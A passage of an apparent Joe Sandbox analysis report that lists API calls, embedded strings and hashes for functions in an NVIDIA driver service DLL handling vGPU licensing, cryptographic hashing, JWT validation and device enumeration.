                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapswprintf$Crypt$AlgorithmProcessProvider$AllocCloseDestroyFreeHashInit_thread_footerOpen
                                                                    • String ID: Failed to allocate memory$Failed to create hash object (0x%x) - (%s)$Failed to generate final hash on the data buffer (0x%x) - (%s)$Failed to get the size of object (0x%x) - (%s)$Failed to open algorithm handle (0x%x) - (%s)$Failed to perform hash on data buffer (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$HashDigestLength$SHA256$computeHash$z
                                                                    • API String ID: 3126380757-3389556609
                                                                    • Opcode ID: b059ba0a22e368afd7ffbfb9dcf22721acfcdc026d5598ebe77179670a913cd6
                                                                    • Instruction ID: 86fdbabcc1ad23f813ec594207a47b10eafa3e09e8791a45049db9e7b8fce3b0
                                                                    • Opcode Fuzzy Hash: b059ba0a22e368afd7ffbfb9dcf22721acfcdc026d5598ebe77179670a913cd6
                                                                    • Instruction Fuzzy Hash: C2221E32A09B42A9FB10DB60E4406ED77B4FB84398F500236DA9C53B69EF3CE659C754
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFAFD
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFB1A
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFB8F
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFC09
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFC38
                                                                    • RegDeleteValueW.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFCFA
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFD13
                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFDD3
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFDF2
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFEA5
                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 00007FF8A8D000D2
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D000F9
                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 00007FF8A8D00171
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D0019A
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D0020F
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D00276
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpi$Close$InfoQuery$AddressDeleteHandleModuleProcValue
                                                                    • String ID: Advapi32.dll$Delete$ForceRemove$NoRemove$RegCreateKeyTransactedW$Val
                                                                    • API String ID: 1125866879-2283023311
                                                                    • Opcode ID: a81cd6ff42175f36a570d7155600b032d25fbc0e0051d893f1f2f01bd3fe8d14
                                                                    • Instruction ID: 5009b1dcf0de34444c93ee0f7dfe29668c2cc5618bf03ccb7ab8c6775c66ef65
                                                                    • Opcode Fuzzy Hash: a81cd6ff42175f36a570d7155600b032d25fbc0e0051d893f1f2f01bd3fe8d14
                                                                    • Instruction Fuzzy Hash: 08329231F0EB42A6FB549B66A85017D66B5EF847C4F104036DA4E87A98EF7CEC44CB18
                                                                    APIs
                                                                    • FindNextFileW.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7318F
                                                                    • CompareFileTime.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D733F7
                                                                    • FindNextFileW.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7348B
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D73496
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D7349C
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D734A2
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D734A8
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D734C1
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D735B7
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D72F2B
                                                                      • Part of subcall function 00007FF8A8D2E228: _Init_thread_footer.LIBCMT ref: 00007FF8A8D2E2EB
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73059
                                                                    • FindFirstFileW.KERNEL32(00000000,00000000,?,?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000), ref: 00007FF8A8D73069
                                                                    • GetLastError.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7307E
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D7309E
                                                                    • FindClose.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D73690
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$FileFind_invalid_parameter_noinfo_noreturn$Next$CloseCompareErrorFirstInit_thread_footerLastTime
                                                                    • String ID: %hs\*.*$Failed to allocate memory$GridCommonUtils.cpp$Maximum buffer size exceeded$Maximum number of files reached$Unable to open directory %s (%d)$getFileFromDirectory
                                                                    • API String ID: 566297033-2797159653
                                                                    • Opcode ID: 95e9fa77f29442ae51123867474ab5d9699e355270a74feb44b2d9aedd89110e
                                                                    • Instruction ID: e7bb7da2b5c1391b3602567f7a7632a6e3743b6ccb444b4c2695be2fa22b736e
                                                                    • Opcode Fuzzy Hash: 95e9fa77f29442ae51123867474ab5d9699e355270a74feb44b2d9aedd89110e
                                                                    • Instruction Fuzzy Hash: CF426F32A0AB82A9EB14DB60E4403ED77A4FB443C8F801136EA5D53BA9EF7CD549C714
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Setup$Device$ErrorLast$CloseInfo$ActiveClassConsoleDestroyDevsEnumEnumerateFreeGet_HandleInstanceListMemoryNode_OpenPropertyQueryRegistrySessionSessionsStatusTokenUserlstrcmpi
                                                                    • String ID: ?$nvlddmkm$ven_10de
                                                                    • API String ID: 3270881034-1305278625
                                                                    • Opcode ID: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
                                                                    • Instruction ID: 2d5d64ce3ec9860c0c3b8b09aae33b86d3b8bf5f8cc95ffc7d912841cc44555e
                                                                    • Opcode Fuzzy Hash: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
                                                                    • Instruction Fuzzy Hash: 6491B336A09B42A6FB509F21E8046AA77A0FB85BD4F444131DF5D03A98DF7CE908CB14
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$FreeLibrary$ErrorFormatInit_thread_footerLastLoadLocalMessageswprintf
                                                                    • String ID: Failed to load ntdll library (%d)$GridCloudLicensingCryptoWindows.cpp$NTDLL.DLL$displayError
                                                                    • API String ID: 493128418-3483970641
                                                                    • Opcode ID: 84a4afb11369bb0699246fdfb17eaa0a2dcfdd60ede8118076655972b869c54a
                                                                    • Instruction ID: bc9b3cd0430cce7c6da11c846aadb0afb2c99b1df81c04b6f16e4a25467d63dd
                                                                    • Opcode Fuzzy Hash: 84a4afb11369bb0699246fdfb17eaa0a2dcfdd60ede8118076655972b869c54a
                                                                    • Instruction Fuzzy Hash: 0B919D32A0AB42A9EB109B60E4443ED3BB0EB447D8F500535DA6D13BA9DF3CE599C758
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLocalProc$AllocErrorLast$Free$AttributesConditionFileInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDevicePropertyW$SetupGetInfDriverStoreLocationW$Setupapi.dll
                                                                    • API String ID: 479516965-190797902
                                                                    • Opcode ID: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
                                                                    • Instruction ID: 504a169f1de5bf1f39e04ca5b3f7ba89bac3bcaa4cf04a9607f9c3b843d4f337
                                                                    • Opcode Fuzzy Hash: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
                                                                    • Instruction Fuzzy Hash: 48A17E35A0AB42E2FB54DB15E84017963A5FF88BC0F444035EA8D437A5EF7DE925CB28
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Local$ConditionFreeMask$AllocFullNamePath$AddressInfoProcVerifyVersion
                                                                    • String ID: $$&$*$SHGetFolderPathW$Shell32.dll
                                                                    • API String ID: 3471609363-2843092907
                                                                    • Opcode ID: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
                                                                    • Instruction ID: 5368f12639b36c63277034af0d3530a5e76bdec55ff4edb13d23d375a8812818
                                                                    • Opcode Fuzzy Hash: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
                                                                    • Instruction Fuzzy Hash: 4271BF71A0B742A2FB54DB11A8146B963A5FF88BC0F444039DE0E47751EF7CF8248B28
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Heap_invalid_parameter_noinfo_noreturnswprintf$CryptProcess$AlgorithmAllocCloseDestroyErrorFreeInit_thread_footerLastLibraryLoadProvider
                                                                    • String ID: Failed to allocate memory$Failed to decrypt data (0x%x) - (%s)$Failed to generate symmetric key$GridCloudLicensingCryptoWindows.cpp$cloudLicTSDecrypt
                                                                    • API String ID: 2854389447-713850402
                                                                    • Opcode ID: 8e5db5f4a7db09f163fea8d2fd5a66426e81deaa305d208767d4c252137c8f24
                                                                    • Instruction ID: 37802e09e986a198f7a3b9c3e2aba6856757b7b0d83b76787cae3c560b110946
                                                                    • Opcode Fuzzy Hash: 8e5db5f4a7db09f163fea8d2fd5a66426e81deaa305d208767d4c252137c8f24
                                                                    • Instruction Fuzzy Hash: BFF13B32A09B41A9EB20DF60E8406DE77B4FB44398F500236DA9C57B69EF3CE159CB54
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: HandleValue$Close$AddressCreateEventExceptionModuleMultipleObjectsProcResetSleepThrowTimerWaitWaitable
                                                                    • String ID: KERNEL32.DLL$SetWaitableTimerEx
                                                                    • API String ID: 484217208-2877992516
                                                                    • Opcode ID: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
                                                                    • Instruction ID: 5f7380710e15a94dcd84bf18817d83dd4338037efed58f2d0c8fc77ddc8949fa
                                                                    • Opcode Fuzzy Hash: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
                                                                    • Instruction Fuzzy Hash: C091B232A0AB82AAEB108F25A45452973A4FF457E0F540335DA7E437E4EF3CE819C724
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: DeallocateValuestd::_$AttributesFileInit_thread_footerlstrcat
                                                                    • String ID: Failed to read configurations from client configuration token. Error :$InitGridCloudLicenseStateMachine$Initializing state machine for nvvsvc $Local storage directory:$NvXDCore.cpp$ProxyServerAddress$ProxyServerPort$SOFTWARE\NVIDIA Corporation\Global\GridLicensing$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing$TrustedStorage$\NVIDIA Corporation$vGPU Licensing
                                                                    • API String ID: 2105504189-1287553087
                                                                    • Opcode ID: de54237209b21e900c89f71d870fed6715800c4f0a1de3a8308ca53b55b6232e
                                                                    • Instruction ID: afc5780ab5700dbc4b45fa2c0657d026c873880e338e8d676257dfff30ac3639
                                                                    • Opcode Fuzzy Hash: de54237209b21e900c89f71d870fed6715800c4f0a1de3a8308ca53b55b6232e
                                                                    • Instruction Fuzzy Hash: 9E326E32A16B81A9E710EF61E8401ED33B4FB457C8F801536DA5D57BAAEF38D218C754
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: BlockCloseCreateEnvironmentErrorHandleLast$BackslashDestroyDirectoryPathProcessSystemUserswprintf
                                                                    • String ID: %srundll32.exe %s%s,nvsvcErrorReport %d$NVSVC64.DLL$WinSta0\Default
                                                                    • API String ID: 1123984594-3221355949
                                                                    • Opcode ID: 0519f0aa9fe9a1010cbe42dd1a385e2634014eeb4eb6fbf3ed9bb9b2cf37a51d
                                                                    • Instruction ID: ad5bd506fddc2d1c491aa1cf2a0439aa142c5e31fcf381094be319f572d467eb
                                                                    • Opcode Fuzzy Hash: 0519f0aa9fe9a1010cbe42dd1a385e2634014eeb4eb6fbf3ed9bb9b2cf37a51d
                                                                    • Instruction Fuzzy Hash: 5A618C32A0AB42A5FB51AF61E8402BE77A0FB857C4F400035DE5E43A95DF7CE955CB28
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$_invalid_parameter_noinfo_noreturn$Ios_base_dtorstd::ios_base::_
                                                                    • String ID: %H:%M$%H:%M:%S
                                                                    • API String ID: 1010869509-4074728551
                                                                    • Opcode ID: c9f013a2d77fcdbbbf855816d4a4bb38bbc75fe1b0b9f63c418a03429bee551e
                                                                    • Instruction ID: 29d4610e9f9a641439f210ecf01552b052326f93718ef33f1124096cacbee89d
                                                                    • Opcode Fuzzy Hash: c9f013a2d77fcdbbbf855816d4a4bb38bbc75fe1b0b9f63c418a03429bee551e
                                                                    • Instruction Fuzzy Hash: 2F72C722A1AAC6A5EB20DF35D8403ED6361FF457D8F805231EA6D17AE9DF38D648C314
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC8DD
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC90D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC93D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC96D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC99D
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • LocalAlloc.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFCA66
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFCB25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    • API String ID: 576420853-2811369298
                                                                    • Opcode ID: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
                                                                    • Instruction ID: b95df4e612608533fd4db0b071a18f2262670f9f2736338c7101960aff0cef4e
                                                                    • Opcode Fuzzy Hash: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
                                                                    • Instruction Fuzzy Hash: E0817F35B0BB12E2FB54DB16A84057562A1FF98BD0F488039CD4D437A0EF7DE9658728
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapswprintf$FreeInit_thread_footerMutexOpenProcess_invalid_parameter_noinfo_noreturn
                                                                    • String ID: Global\GridLicenseUtilMutex-D2FCF701-B1AC-4158-B070-B5944D631573$GridCloudLicenseStateMachine.cpp$GridCloudLicenseStateMachine::GridCloudLicenseStateMachine$InitGridCloudLicenseStateMachine$Mutex init failed : %s$NvXDCore.cpp$Starting cloud license state machine in unlicensed state
                                                                    • API String ID: 2775131440-2565526366
                                                                    • Opcode ID: 7fbcd51417c2ce944dd4776cb225de7be85ad73448ec72368c4d622f86bfed91
                                                                    • Instruction ID: fd256d29dd2a220bc12ef604a753cb9bf22caca1922b5d7fc236c7284388e030
                                                                    • Opcode Fuzzy Hash: 7fbcd51417c2ce944dd4776cb225de7be85ad73448ec72368c4d622f86bfed91
                                                                    • Instruction Fuzzy Hash: 9BE18E32A0AB81AAE754DF35E8403ED77A4FB49388F404235EA9C57B55EF38E168C714
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Close$InfoQuery$AddressCreateFromHandleInstanceModuleProcString
                                                                    • String ID: CLSID\$\Implemented Categories$\Required Categories
                                                                    • API String ID: 2927819212-4092563799
                                                                    • Opcode ID: 8854d937e459bdcea6ecb079211e8498e5b1a390fea664733db5c66b64342e8a
                                                                    • Instruction ID: 2825892968a71067a6de45149e0120fcc58e3eed4a8cdd06a58ac43b701ef0e5
                                                                    • Opcode Fuzzy Hash: 8854d937e459bdcea6ecb079211e8498e5b1a390fea664733db5c66b64342e8a
                                                                    • Instruction Fuzzy Hash: 9F02D535A0A746A1FB64DB65E4402BD23A1FF447C4F140136DB5D47AA8EF3CE858CB29
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footerswprintf
                                                                    • String ID: Failed to allocate memory$Failed to decode signature from token received$Failed to process JWT token$Failed to validate client configuration token$GridCommonUtils.cpp$verifySignature
                                                                    • API String ID: 732731317-307524478
                                                                    • Opcode ID: 60f0a91414a4c17a35b2dc9e685243dc3246e9d4e4b541b4ace639f51f741c86
                                                                    • Instruction ID: 03ae25d7654281f47eda812a8dfdeb73205fe788430bde343f895c7acd88e9ef
                                                                    • Opcode Fuzzy Hash: 60f0a91414a4c17a35b2dc9e685243dc3246e9d4e4b541b4ace639f51f741c86
                                                                    • Instruction Fuzzy Hash: 84025132A0AB82A5FB20DB65E4406ED77B4FB85388F800135DA5D57B99EF3CE119CB14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: "service_instance_public_key_pem":"$Could not fetch value for service instance public key$Failed to decode payload$Failed to process JWT token$GridCommonUtils.cpp$getPublicKey
                                                                    • API String ID: 2214013052-3729035618
                                                                    • Opcode ID: 7e758ee033a478cd587704f63f01072de100f83d3495ce6fd29ae4bce839deb4
                                                                    • Instruction ID: 6c7370bb5e03b2ec43459ed03fe4211260f651bb840326f10e3e75e88933582e
                                                                    • Opcode Fuzzy Hash: 7e758ee033a478cd587704f63f01072de100f83d3495ce6fd29ae4bce839deb4
                                                                    • Instruction Fuzzy Hash: 47E17D32A1AB92A9FB149B64E8403ED77A4FB453C8F840136DA5D53B99EF3CD109C724
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandleInit_thread_footer
                                                                    • String ID: 9$Failed to open NvPciFilter driver interface$NVIDIA_NVPCIFLT_IOCTL_POWERUP_GPU failed$PowerOnDGpu$ZeroPowerOnBootUtil.cpp$\\.\nvpciflt
                                                                    • API String ID: 4084529720-463136028
                                                                    • Opcode ID: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
                                                                    • Instruction ID: 5aae491dc1ed41b02a01f7d8122d7b57f0b44d6e58a310e3ede4e08e0233ab88
                                                                    • Opcode Fuzzy Hash: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
                                                                    • Instruction Fuzzy Hash: B5611F72A0AB01E9E711DFA0E4501ED33B4FB45398F801636EA5D17BA9EF38D219C758
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: Base64 target buffer too small$GridCommonUtils.cpp$Invalid base64 char conversion %c$Invalid state in base64$base64Decode
                                                                    • API String ID: 2214013052-3687260524
                                                                    • Opcode ID: 06f17cfdf99209c0d11bf88da801afd0ece1d720c5b23629c5c04ba441876928
                                                                    • Instruction ID: 0e5c68f231f6e27a7027b4563e4185d59a0f588b95de3da576b2f04b19fb9c75
                                                                    • Opcode Fuzzy Hash: 06f17cfdf99209c0d11bf88da801afd0ece1d720c5b23629c5c04ba441876928
                                                                    • Instruction Fuzzy Hash: 2AD19532A0AB82A9F710CB64E4403ED77A4FB45394F90013AD69E07BA5EF3CE559CB14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                    • String ID: ?
                                                                    • API String ID: 435049134-1684325040
                                                                    • Opcode ID: 3ba54a54f64e311380a596a5b8c13d47f214089bdc2c0bf900aca5c65f45a280
                                                                    • Instruction ID: c18b5499501c0044e9b05a70d309f9befe88a67c64098191d4a607ecb9ff2cca
                                                                    • Opcode Fuzzy Hash: 3ba54a54f64e311380a596a5b8c13d47f214089bdc2c0bf900aca5c65f45a280
                                                                    • Instruction Fuzzy Hash: C0D1F632A0AA46AFE7509F21D8402B93F96FF447D8F444131EA6D47696EF3CE845C728
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                      • Part of subcall function 00007FF8A8D060EC: std::current_exception.LIBCMT ref: 00007FF8A8D06119
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF8A8D06D16
                                                                      • Part of subcall function 00007FF8A8D9CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FF8A8D9CA35
                                                                      • Part of subcall function 00007FF8A8D0E0A4: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0E0FC
                                                                      • Part of subcall function 00007FF8A8D0E194: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0E1F0
                                                                    Strings
                                                                    Memory Dump Source
